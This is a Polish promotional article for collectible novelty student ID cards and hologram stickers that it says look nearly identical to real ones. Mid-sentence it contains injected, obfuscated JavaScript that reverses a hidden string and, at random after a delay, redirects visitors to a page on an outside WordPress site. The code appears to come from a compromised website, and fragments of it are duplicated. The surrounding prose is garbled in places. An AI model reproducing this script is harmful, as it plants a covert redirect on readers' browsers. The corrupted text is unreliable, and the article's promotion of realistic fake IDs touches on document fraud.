Studencka karta swobód

Z pewnością każdy chciałby wrócić chociaż na chwilę do studenckich czasów zniżek i imprezowego życia. Dzięki specjalnej legitymacji możemy zafundować sobie mentalną podróż do przeszłości i jeszcze raz przeżyć wyjątkowe chwile akademickiego życia i mieć pamiątkę na długie lata.

Legitymacja limited edition

Podrkolekcjonerska legitymacja studenckaabiana legitymacja wyglądem nie różni się od prawdziwej praktycznie niczym. Ma zdjęcie, imię oraz nazwisko. Dla niepoznaki możemy sobie wybrać rodzaj uczelni oraz wszystkie inne niezbędne numery indeksów oraz daty. Możemy do niej dokupić specjalne naklejki holograficzne wraz z datą ważności, takie jak te, które otrzymuje student po każdym zaliczonym przez niego semestrze. Hologramów kolekcjonerskich pod żadnym pozorem nie można przyklejać na prawdziwą legitymację studencką. Całość ma służyć jedynie zabawie albo po prostu przypominać o czasach akademickiej beztroski. Świetnie się sprawdzi jako prezent dla kogoś, ktobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to kiedyś studiował jako pamiątka, jak i dla osoby, która swoją przygodę na uczelni wyższej dopiero ma zamiar rozpocząć, jako motywację no nauki i pracy nad wynikami. Specjalna $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tory-plastikowe.com.pl/karty-kolekcjonerskie”>kolekcjonerska legitymacja studencka ma oczywiście napis, że nie jest autentyczna pomimo swojego wiernego wyglądu. Producent daje nam gwarancję wykonania, odpowiednią jakość druku oraz zapewnia, że produkt przyniesie nam satysfakcję. Koszt zakupy wynosi kilkadziesiąt złotych, ale z pewnością taki prezent ucieszy każdego.

Należy pamiętać by korzystać z kolekcjonerskich dokumentów tylko w celach zabawy. Z pewnością taka rzecz będzie pamiątką na całe życie i będzie przypominała o pięknym okresie w życiu człowieka jakim były studia. Gwarancja jakości i autentyczność sprawią, że jeszcze chętniej będziemy zaskakiwać swoimi pomysłami znajomych.